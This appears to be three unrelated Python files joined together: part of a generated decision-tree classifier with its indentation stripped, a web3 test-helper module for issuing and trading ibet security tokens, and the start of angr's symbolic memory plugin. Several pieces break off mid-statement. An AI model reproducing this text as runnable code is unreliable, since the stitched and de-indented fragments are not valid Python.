if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>1:
# {"feature": "Restaurant20to50", "instances": 105, "metric_value": 0.4749, "depth": 8}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 90, "metric_value": 0.4651, "depth": 9}
if obj[6]<=3:
# {"feature": "Children", "instances": 86, "metric_value": 0.4764, "depth": 10}
if obj[5]<=0:
# {"feature": "Age", "instances": 55, "metric_value": 0.4836, "depth": 11}
if obj[4]<=5:
# {"feature": "Bar", "instances": 50, "metric_value": 0.4926, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Gender", "instances": 29, "metric_value": 0.4932, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Gender", "instances": 21, "metric_value": 0.4805, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>5:
# {"feature": "Bar", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
elif obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 31, "metric_value": 0.4185, "depth": 11}
if obj[3]>0:
# {"feature": "Bar", "instances": 17, "metric_value": 0.2801, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Age", "instances": 14, "metric_value": 0.2251, "depth": 13}
if obj[4]<=4:
return 'True'
elif obj[4]>4:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Age", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[4]<=0:
return 'True'
elif obj[4]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Age", "instances": 14, "metric_value": 0.381, "depth": 12}
if obj[4]>0:
# {"feature": "Bar", "instances": 12, "metric_value": 0.4333, "depth": 13}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[6]>3:
return 'True'
else: return 'True'
elif obj[10]>2.0:
# {"feature": "Bar", "instances": 15, "metric_value": 0.3636, "depth": 9}
if obj[8]>1.0:
# {"feature": "Age", "instances": 11, "metric_value": 0.2727, "depth": 10}
if obj[4]<=1:
# {"feature": "Education", "instances": 8, "metric_value": 0.3, "depth": 11}
if obj[6]<=2:
# {"feature": "Gender", "instances": 5, "metric_value": 0.4, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[4]>1:
return 'True'
else: return 'True'
elif obj[8]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[7]>18.185882392956827:
# {"feature": "Age", "instances": 119, "metric_value": 0.2638, "depth": 6}
if obj[4]<=6:
# {"feature": "Education", "instances": 111, "metric_value": 0.2413, "depth": 7}
if obj[6]>0:
# {"feature": "Time", "instances": 71, "metric_value": 0.2853, "depth": 8}
if obj[1]>0:
# {"feature": "Gender", "instances": 51, "metric_value": 0.3153, "depth": 9}
if obj[3]>0:
# {"feature": "Bar", "instances": 36, "metric_value": 0.1852, "depth": 10}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
# {"feature": "Children", "instances": 15, "metric_value": 0.4286, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.3333, "depth": 12}
if obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[10]<=1.0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4857, "depth": 12}
if obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[10]<=1.0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Bar", "instances": 15, "metric_value": 0.3556, "depth": 10}
if obj[8]<=2.0:
# {"feature": "Children", "instances": 12, "metric_value": 0.4167, "depth": 11}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.3571, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4048, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Bar", "instances": 20, "metric_value": 0.0857, "depth": 9}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.1905, "depth": 10}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[3]<=1:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Time", "instances": 40, "metric_value": 0.1234, "depth": 8}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 32, "metric_value": 0.0547, "depth": 9}
if obj[10]>0.0:
return 'True'
elif obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2, "depth": 10}
if obj[11]<=0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.32, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[5]<=1:
# {"feature": "Bar", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[8]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.3333, "depth": 9}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4, "depth": 10}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.3, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[11]<=0:
# {"feature": "Bar", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[8]<=0.0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>6:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 7}
if obj[11]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 8}
if obj[1]>1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 9}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[6]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if | |
# tests/contract_modules.py
"""
Copyright BOOSTRY Co., Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import json
import time
from web3 import Web3
from web3.middleware import geth_poa_middleware
from eth_utils import to_checksum_address
from app import config
from app.contracts import Contract
from tests.account_config import eth_account
web3 = Web3(Web3.HTTPProvider(config.WEB3_HTTP_PROVIDER))
web3.middleware_onion.inject(geth_poa_middleware, layer=0)
# 名簿用個人情報登録
# NOTE: issuer address に対する情報の公開を行う
def register_personalinfo(invoker, personal_info):
    """Register the invoker's encrypted personal data, disclosed to the issuer account."""
    web3.eth.defaultAccount = invoker['account_address']
    personal_info_contract = Contract.get_contract(
        'PersonalInfo', personal_info['address'])
    issuer_address = eth_account['issuer']['account_address']
    encrypted_info = 'some_encrypted_info'
    tx_hash = personal_info_contract.functions.register(
        issuer_address, encrypted_info
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# 決済用銀行口座情報登録
def register_payment_gateway(invoker, payment_gateway):
    """Register the invoker's bank account info, then have the agent approve it."""
    gateway = Contract.get_contract(
        'PaymentGateway', payment_gateway['address'])

    # Step 1: the invoker registers its (encrypted) account information.
    web3.eth.defaultAccount = invoker['account_address']
    agent = eth_account['agent']
    encrypted_info = 'some_encrypted_info'
    tx_hash = gateway.functions.register(
        agent['account_address'], encrypted_info
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)

    # Step 2: the collection agent approves the registration.
    web3.eth.defaultAccount = agent['account_address']
    tx_hash = gateway.functions.approve(
        invoker['account_address']
    ).transact({'from': agent['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# トークン移転
def transfer_token(token_contract, from_address, to_address, amount):
    """Transfer *amount* tokens from *from_address* to *to_address*.

    NOTE(review): unlike the other helpers here, this neither sets
    web3.eth.defaultAccount nor waits for the transaction receipt —
    presumably intentional (fire-and-forget); confirm with callers.
    """
    transfer_fn = token_contract.functions.transfer(to_address, amount)
    transfer_fn.transact({'from': from_address})
'''
Straight Bond Token (普通社債)
'''
# 債券トークンの発行
def issue_bond_token(invoker, attribute):
    """Deploy an IbetStraightBond token and initialise its non-constructor fields.

    :param invoker: account dict; 'account_address' is the issuing account
    :param attribute: token attributes (name, symbol, supply, dates, ...)
    :return: dict with the deployed contract 'address' and 'abi'
    """
    web3.eth.defaultAccount = invoker['account_address']

    # The 12 monthly interest payment dates are stored on-chain as one JSON
    # string. The comprehension preserves key order 1..12, so the serialized
    # string is identical to the previous hand-written literal.
    interest_payment_date = json.dumps({
        'interestPaymentDate' + str(n): attribute['interestPaymentDate' + str(n)]
        for n in range(1, 13)
    })

    arguments = [
        attribute['name'], attribute['symbol'], attribute['totalSupply'],
        attribute['faceValue'],
        attribute['redemptionDate'], attribute['redemptionValue'],
        attribute['returnDate'], attribute['returnAmount'],
        attribute['purpose']
    ]
    contract_address, abi = Contract.deploy_contract(
        'IbetStraightBond',
        arguments,
        invoker['account_address']
    )

    # Set the fields not covered by the constructor. A fresh tx-params dict is
    # built per call in case transact() mutates its argument.
    def _tx_params():
        return {'from': invoker['account_address'], 'gas': 4000000}

    TokenContract = Contract.get_contract('IbetStraightBond', contract_address)
    TokenContract.functions.setTradableExchange(attribute['tradableExchange']). \
        transact(_tx_params())
    TokenContract.functions.setInterestRate(attribute['interestRate']). \
        transact(_tx_params())
    TokenContract.functions.setInterestPaymentDate(interest_payment_date). \
        transact(_tx_params())
    TokenContract.functions.setMemo(attribute['memo']). \
        transact(_tx_params())
    TokenContract.functions.setContactInformation(attribute['contactInformation']). \
        transact(_tx_params())
    TokenContract.functions.setPrivacyPolicy(attribute['privacyPolicy']). \
        transact(_tx_params())
    TokenContract.functions.setPersonalInfoAddress(attribute['personalInfoAddress']). \
        transact(_tx_params())
    # Bug fix: the original sent setMemo a second time here; the duplicate
    # transaction was redundant and has been removed.
    TokenContract.functions.setTransferable(True). \
        transact(_tx_params())

    return {'address': contract_address, 'abi': abi}
# 債券トークンのリスト登録
def register_bond_list(invoker, bond_token, token_list):
    """Add a bond token to the public TokenList contract."""
    token_list_contract = Contract.get_contract(
        'TokenList', token_list['address'])
    web3.eth.defaultAccount = invoker['account_address']
    tx_hash = token_list_contract.functions.register(
        bond_token['address'], 'IbetStraightBond'
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# 債券トークンの募集
def offer_bond_token(invoker, bond_exchange, bond_token, amount, price):
    # Deposit the tokens into the exchange, then place a sell order for them.
    bond_transfer_to_exchange(invoker, bond_exchange, bond_token, amount)
    make_sell(invoker, bond_exchange, bond_token, amount, price)
# 取引コントラクトに債券トークンをチャージ
def bond_transfer_to_exchange(invoker, bond_exchange, bond_token, amount):
    """Deposit *amount* of the bond token into the exchange contract."""
    web3.eth.defaultAccount = invoker['account_address']
    bond = Contract.get_contract('IbetStraightBond', bond_token['address'])
    tx_hash = bond.functions.transfer(
        bond_exchange['address'], amount
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# 債券の償還
def bond_redeem(invoker, token):
    """Mark the bond token as redeemed."""
    web3.eth.defaultAccount = invoker['account_address']
    bond = Contract.get_contract('IbetStraightBond', token['address'])
    tx_hash = bond.functions.changeToRedeemed().transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# 債券の譲渡可否変更
def bond_change_transferable(invoker, token, transferable):
    """Set the bond token's transferable flag to *transferable*."""
    web3.eth.defaultAccount = invoker['account_address']
    bond = Contract.get_contract('IbetStraightBond', token['address'])
    tx_hash = bond.functions.setTransferable(transferable).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# 債券の無効化
def bond_invalidate(invoker, token):
    """Invalidate the bond token (set its status flag to False)."""
    web3.eth.defaultAccount = invoker['account_address']
    bond = Contract.get_contract('IbetStraightBond', token['address'])
    tx_hash = bond.functions.setStatus(False).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# 債券の譲渡不可
def bond_untransferable(invoker, token):
    """Make the bond token non-transferable.

    Equivalent to bond_change_transferable(invoker, token, False): the same
    default-account assignment, setTransferable(False) transaction and
    receipt wait are performed.
    """
    bond_change_transferable(invoker, token, False)
'''
Share Token (株式)
'''
# 株式トークンの発行
def issue_share_token(invoker, attribute):
    """Deploy an IbetShare token and apply any optional attributes present.

    Optional attributes are applied in a fixed order (tradableExchange,
    personalInfoAddress, contactInformation, privacyPolicy, memo,
    transferable), matching the transaction order of the original helper.
    """
    web3.eth.defaultAccount = invoker['account_address']
    constructor_args = [
        attribute['name'],
        attribute['symbol'],
        attribute['issuePrice'],
        attribute['totalSupply'],
        attribute['dividends'],
        attribute['dividendRecordDate'],
        attribute['dividendPaymentDate'],
        attribute['cancellationDate'],
        attribute['principalValue']
    ]
    contract_address, abi = Contract.deploy_contract(
        contract_name='IbetShare',
        args=constructor_args,
        deployer=invoker['account_address']
    )

    token = Contract.get_contract('IbetShare', contract_address)
    # (attribute key, setter, optional value converter) — order matters.
    optional_setters = [
        ('tradableExchange', token.functions.setTradableExchange, to_checksum_address),
        ('personalInfoAddress', token.functions.setPersonalInfoAddress, to_checksum_address),
        ('contactInformation', token.functions.setContactInformation, None),
        ('privacyPolicy', token.functions.setPrivacyPolicy, None),
        ('memo', token.functions.setMemo, None),
        ('transferable', token.functions.setTransferable, None),
    ]
    for key, setter, convert in optional_setters:
        if key in attribute:
            value = attribute[key] if convert is None else convert(attribute[key])
            setter(value).transact(
                {'from': invoker['account_address'], 'gas': 4000000})

    time.sleep(3)
    return {'address': contract_address, 'abi': abi}
# 株式トークンのリスト登録
def register_share_list(invoker, share_token, token_list):
    """Add a share token to the public TokenList contract."""
    token_list_contract = Contract.get_contract(
        'TokenList', token_list['address'])
    web3.eth.defaultAccount = invoker['account_address']
    tx_hash = token_list_contract.functions.register(
        share_token['address'], 'IbetShare'
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# 株式Tokenの募集(売出)
def share_offer(invoker, exchange, token, amount, price):
    # Deposit the tokens into the exchange, then place a sell order for them.
    share_transfer_to_exchange(invoker, exchange, token, amount)
    make_sell(invoker, exchange, token, amount, price)
# 取引コントラクトに株式トークンをチャージ
def share_transfer_to_exchange(invoker, exchange, token, amount):
    """Deposit *amount* of the share token into the exchange contract."""
    web3.eth.defaultAccount = invoker['account_address']
    share = Contract.get_contract('IbetShare', token['address'])
    tx_hash = share.functions.transfer(
        exchange['address'], amount
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# 株式トークンの無効化
def invalidate_share_token(invoker, token):
    """Invalidate the share token (set its status flag to False)."""
    web3.eth.defaultAccount = invoker['account_address']
    share = Contract.get_contract('IbetShare', token['address'])
    tx_hash = share.functions.setStatus(False).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# 株式トークンの譲渡不可
def untransferable_share_token(invoker, token):
    """Make the share token non-transferable."""
    web3.eth.defaultAccount = invoker['account_address']
    share = Contract.get_contract('IbetShare', token['address'])
    tx_hash = share.functions.setTransferable(False).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
'''
Coupon Token (クーポン)
'''
# クーポントークンの発行
def issue_coupon_token(invoker, attribute):
    """Deploy an IbetCoupon token; every attribute is a constructor argument."""
    web3.eth.defaultAccount = invoker['account_address']
    constructor_args = [
        attribute[key] for key in (
            'name', 'symbol', 'totalSupply',
            'tradableExchange',
            'details', 'returnDetails', 'memo',
            'expirationDate', 'transferable',
            'contactInformation', 'privacyPolicy',
        )
    ]
    contract_address, abi = Contract.deploy_contract(
        'IbetCoupon', constructor_args, invoker['account_address'])
    return {'address': contract_address, 'abi': abi}
# クーポンTokenの公開リスト登録
def coupon_register_list(invoker, token, token_list):
    """Add a coupon token to the public TokenList contract."""
    web3.eth.defaultAccount = invoker['account_address']
    token_list_contract = Contract.get_contract(
        'TokenList', token_list['address'])
    tx_hash = token_list_contract.functions.register(
        token['address'], 'IbetCoupon'
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの割当
def transfer_coupon_token(invoker, coupon_token, to, value):
    """Allot *value* coupon tokens from the invoker to address *to*."""
    web3.eth.defaultAccount = invoker['account_address']
    coupon = Contract.get_contract('IbetCoupon', coupon_token['address'])
    tx_hash = coupon.functions.transfer(to, value).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの無効化
def invalidate_coupon_token(invoker, coupon_token):
    """Invalidate the coupon token (set its status flag to False)."""
    web3.eth.defaultAccount = invoker['account_address']
    coupon = Contract.get_contract('IbetCoupon', coupon_token['address'])
    tx_hash = coupon.functions.setStatus(False).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの譲渡不可
def untransferable_coupon_token(invoker, coupon_token):
    """Make the coupon token non-transferable."""
    web3.eth.defaultAccount = invoker['account_address']
    coupon = Contract.get_contract('IbetCoupon', coupon_token['address'])
    tx_hash = coupon.functions.setTransferable(False).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの消費
def consume_coupon_token(invoker, coupon_token, value):
    """Consume *value* units of the coupon token from the invoker's balance."""
    web3.eth.defaultAccount = invoker['account_address']
    coupon = Contract.get_contract('IbetCoupon', coupon_token['address'])
    tx_hash = coupon.functions.consume(value).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの売出
def coupon_offer(invoker, exchange, token, amount, price):
    # Deposit the tokens into the DEX, then place a sell order for them.
    coupon_transfer_to_exchange(invoker, exchange, token, amount)
    make_sell(invoker, exchange, token, amount, price)
# クーポンDEXコントラクトにクーポントークンをデポジット
def coupon_transfer_to_exchange(invoker, exchange, token, amount):
    """Deposit *amount* of the coupon token into the DEX contract."""
    web3.eth.defaultAccount = invoker['account_address']
    coupon = Contract.get_contract('IbetCoupon', token['address'])
    tx_hash = coupon.functions.transfer(
        exchange['address'], amount
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
'''
Membership Token (会員権)
'''
# 会員権Tokenの発行
def membership_issue(invoker, attribute):
    """Deploy an IbetMembership token; every attribute is a constructor argument."""
    web3.eth.defaultAccount = invoker['account_address']
    constructor_args = [
        attribute[key] for key in (
            'name', 'symbol', 'initialSupply',
            'tradableExchange',
            'details', 'returnDetails',
            'expirationDate', 'memo',
            'transferable',
            'contactInformation', 'privacyPolicy',
        )
    ]
    contract_address, abi = Contract.deploy_contract(
        'IbetMembership', constructor_args, invoker['account_address'])
    return {'address': contract_address, 'abi': abi}
def membership_register_list(invoker, token, token_list):
    """Register an IbetMembership token on the public TokenList contract."""
    web3.eth.defaultAccount = invoker['account_address']
    list_contract = Contract.get_contract('TokenList', token_list['address'])
    tx_hash = list_contract.functions.register(token['address'], 'IbetMembership').transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def membership_invalidate(invoker, token):
    """Invalidate an IbetMembership token via setStatus(False)."""
    web3.eth.defaultAccount = invoker['account_address']
    contract = Contract.get_contract('IbetMembership', token['address'])
    tx_hash = contract.functions.setStatus(False).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def membership_untransferable(invoker, token):
    """Make an IbetMembership token non-transferable via setTransferable(False)."""
    web3.eth.defaultAccount = invoker['account_address']
    contract = Contract.get_contract('IbetMembership', token['address'])
    tx_hash = contract.functions.setTransferable(False).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
# Offer (sell) membership tokens
def membership_offer(invoker, exchange, token, amount, price):
    """Offer membership tokens for sale: deposit them to the DEX, then place a sell order."""
    membership_transfer_to_exchange(invoker, exchange, token, amount)
    make_sell(invoker, exchange, token, amount, price)
def membership_transfer_to_exchange(invoker, exchange, token, amount):
    """Deposit IbetMembership tokens into the membership DEX (exchange) contract."""
    web3.eth.defaultAccount = invoker['account_address']
    contract = Contract.get_contract('IbetMembership', token['address'])
    tx_hash = contract.functions.transfer(exchange['address'], amount).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
'''
DEX
'''
def make_sell(invoker, exchange, token, amount, price):
    """Place a sell (maker) order on the IbetExchange DEX.

    The settlement agent account is taken from the shared `eth_account` fixture.
    """
    web3.eth.defaultAccount = invoker['account_address']
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    agent = eth_account['agent']
    # createOrder(token, amount, price, isBuy=False, agent)
    tx_hash = exchange_contract.functions.createOrder(
        token['address'], amount, price, False, agent['account_address']
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def take_buy(invoker, exchange, order_id, amount):
    """Take an existing order as a buyer: executeOrder(order_id, amount, isBuy=True)."""
    web3.eth.defaultAccount = invoker['account_address']
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    tx_hash = exchange_contract.functions.executeOrder(order_id, amount, True).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def make_buy(invoker, exchange, token, amount, price):
    """Place a buy (maker) order on the IbetExchange DEX.

    The settlement agent account is taken from the shared `eth_account` fixture.
    """
    web3.eth.defaultAccount = invoker['account_address']
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    agent = eth_account['agent']
    # createOrder(token, amount, price, isBuy=True, agent)
    tx_hash = exchange_contract.functions.createOrder(
        token['address'], amount, price, True, agent['account_address']
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def take_sell(invoker, exchange, order_id, amount):
    """Take an existing order as a seller: executeOrder(order_id, amount, isBuy=False)."""
    web3.eth.defaultAccount = invoker['account_address']
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    tx_hash = exchange_contract.functions.executeOrder(order_id, amount, False).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def get_latest_orderid(exchange):
    """Return the most recently assigned order ID on the exchange (read-only call)."""
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    return exchange_contract.functions.latestOrderId().call()
def cancel_order(invoker, exchange, order_id):
    """Cancel an order on the exchange via cancelOrder(order_id)."""
    web3.eth.defaultAccount = invoker['account_address']
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    tx_hash = exchange_contract.functions.cancelOrder(order_id).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def force_cancel_order(invoker, exchange, order_id):
    """Force-cancel an order on the exchange via forceCancelOrder(order_id)."""
    web3.eth.defaultAccount = invoker['account_address']
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    tx_hash = exchange_contract.functions.forceCancelOrder(order_id).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def get_latest_agreementid(exchange, order_id):
    """Return the most recent agreement ID for the given order (read-only call)."""
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    return exchange_contract.functions.latestAgreementId(order_id).call()
def confirm_agreement(invoker, exchange, order_id, agreement_id):
    """Confirm (settle) an agreement via confirmAgreement(order_id, agreement_id)."""
    web3.eth.defaultAccount = invoker['account_address']
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    tx_hash = exchange_contract.functions.confirmAgreement(order_id, agreement_id).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def cancel_agreement(invoker, exchange, order_id, agreement_id):
    """Cancel an agreement via cancelAgreement(order_id, agreement_id)."""
    web3.eth.defaultAccount = invoker['account_address']
    exchange_contract = Contract.get_contract('IbetExchange', exchange['address'])
    tx_hash = exchange_contract.functions.cancelAgreement(order_id, agreement_id).transact(
        {'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def create_security_token_escrow(invoker, exchange, token, recipient_address, agent_address, amount):
    """Create an escrow on the IbetSecurityTokenEscrow contract.

    The two "{}" arguments are empty JSON strings for the escrow's data fields.
    """
    web3.eth.defaultAccount = invoker['account_address']
    escrow_contract = Contract.get_contract('IbetSecurityTokenEscrow', exchange['address'])
    tx_hash = escrow_contract.functions.createEscrow(
        token['address'], recipient_address, amount, agent_address, "{}", "{}"
    ).transact({'from': invoker['account_address'], 'gas': 4000000})
    web3.eth.waitForTransactionReceipt(tx_hash)
def get_latest_security_escrow_id(exchange):
IbetSecurityTokenEscrowContract = Contract. \
get_contract('IbetSecurityTokenEscrow', | |
# angr/state_plugins/symbolic_memory.py
from collections import defaultdict
import logging
import itertools
l = logging.getLogger(name=__name__)
import claripy
from ..storage.memory import SimMemory, DUMMY_SYMBOLIC_READ_VALUE
from ..storage.paged_memory import SimPagedMemory
from ..storage.memory_object import SimMemoryObject
from ..sim_state_options import SimStateOptions
from ..misc.ux import once
DEFAULT_MAX_SEARCH = 8
class MultiwriteAnnotation(claripy.Annotation):
    """Claripy annotation marking an AST as eligible for multi-write concretization."""
    @property
    def eliminatable(self):
        # The annotation must survive AST simplification (see claripy.Annotation).
        return False
    @property
    def relocateable(self):
        # The annotation may be carried over to derived/simplified ASTs.
        return True
def _multiwrite_filter(mem, ast): #pylint:disable=unused-argument
# this is a huge hack, but so is the whole multiwrite crap
return any(isinstance(a, MultiwriteAnnotation) for a in ast._uneliminatable_annotations)
class SimSymbolicMemory(SimMemory): #pylint:disable=abstract-method
_CONCRETIZATION_STRATEGIES = [ 'symbolic', 'symbolic_approx', 'any', 'any_approx', 'max', 'max_approx',
'symbolic_nonzero', 'symbolic_nonzero_approx', 'norepeats' ]
_SAFE_CONCRETIZATION_STRATEGIES = [ 'symbolic', 'symbolic_approx' ]
def __init__(
self, memory_backer=None, permissions_backer=None, mem=None, memory_id="mem",
endness=None, abstract_backer=False, check_permissions=None,
read_strategies=None, write_strategies=None, stack_region_map=None, generic_region_map=None
):
SimMemory.__init__(self,
endness=endness,
abstract_backer=abstract_backer,
stack_region_map=stack_region_map,
generic_region_map=generic_region_map
)
self.id = memory_id
if check_permissions is None:
check_permissions = self.category == 'mem'
self.mem = SimPagedMemory(
memory_backer=memory_backer,
permissions_backer=permissions_backer,
